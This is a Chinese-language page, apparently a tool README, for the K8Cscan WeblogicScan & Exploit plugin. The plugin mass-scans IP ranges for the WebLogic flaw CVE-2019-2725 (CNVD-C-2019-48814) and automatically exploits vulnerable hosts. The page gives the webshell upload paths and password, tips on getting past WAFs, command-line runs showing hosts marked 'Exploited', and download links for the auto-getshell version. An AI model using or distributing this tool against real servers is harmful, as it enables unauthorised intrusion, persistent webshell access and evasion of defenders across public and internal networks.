主程序: K8Cscan 大型內網滲透自定義掃描器
https://www.cnblogs.com/k8gege/p/10519321.html
WeblogicScan插件
K8Cscan Moudle WeblogicScan & Exploit
目前僅支持漏洞編號 CNVD-C-2019-48814
該版本為探測weblogic漏洞並自動GetShell
外網可當成EXP使用,也可內網自動滲透用
無論內外網均可批量(填寫ip或ip段列表即可)
(弄exp的時候還沒CVE,所以回顯寫着CNVD,過了兩天才有CVE-2019-2725,同一個漏洞不同叫法而已大家不要慌)
3.6支持URL和IP端口
用法:
K8cmdshell 向兩個默認路徑上傳webshell
使用飛刀cmd連接,經過Base64加密可過waf
傳輸CMD命令不加密,容易被WAF攔截或管理員發現
http://192.168.1.106:7001/_async/shell.jsp tom
http://192.168.1.106:7001/bea_wls_internal/shell.jsp tom //http://192.168.1.106:7001/_async/shell.jsp tom //http://192.168.1.106:7001/bea_wls_internal/shell.jsp tom 指定IP(當成EXP用,填寫內網或外網IP即可) C:\Users\K8team\Desktop\Cscan>Cscan20.exe 192.168.1.106 Cscan 3.5 By K8gege load netscan.dll 192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited Finished! 指定C段 C:\Users\K8team\Desktop\Cscan>Cscan20.exe 192.168.1.106/24 Cscan 3.5 By K8gege load netscan.dll Segment: 192.168.1.0 ============================================= 192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited 192.168.1.1 192.168.1.105 192.168.1.108 192.168.1.100 ============================================= onlinePC:5 Finished! 指定IP列表同目錄下ip.txt(示例掃描3個IP) C:\Users\K8team\Desktop\Cscan>Cscan20.exe Cscan 3.5 By K8gege load netscan.dll scan ip.txt (IP) ============================================= 192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited 192.168.1.105 192.168.1.1 ============================================= onlinePC:3 Finished! 指定C段列表同目錄下ipc.txt(示例掃描一個IP段) C:\Users\K8team\Desktop\Cscan>Cscan20.exe Cscan 3.5 By K8gege load netscan.dll scan ipc.txt (IP/24) Segment: 192.168.1.0 ============================================= 192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited 192.168.1.1 192.168.1.105 192.168.1.108 ============================================= onlinePC:4 Finished!
3、下載
自動Getshell
https://github.com/k8gege/K8tools/blob/master/K8Cscan%20Moudle%20WeblogicScan%20%26%20Exploit.rar
僅掃描漏洞
https://github.com/k8gege/K8tools/blob/master/K8Cscan%20Moudle%20WeblogicScan%20Only%20Poc.rar
主程序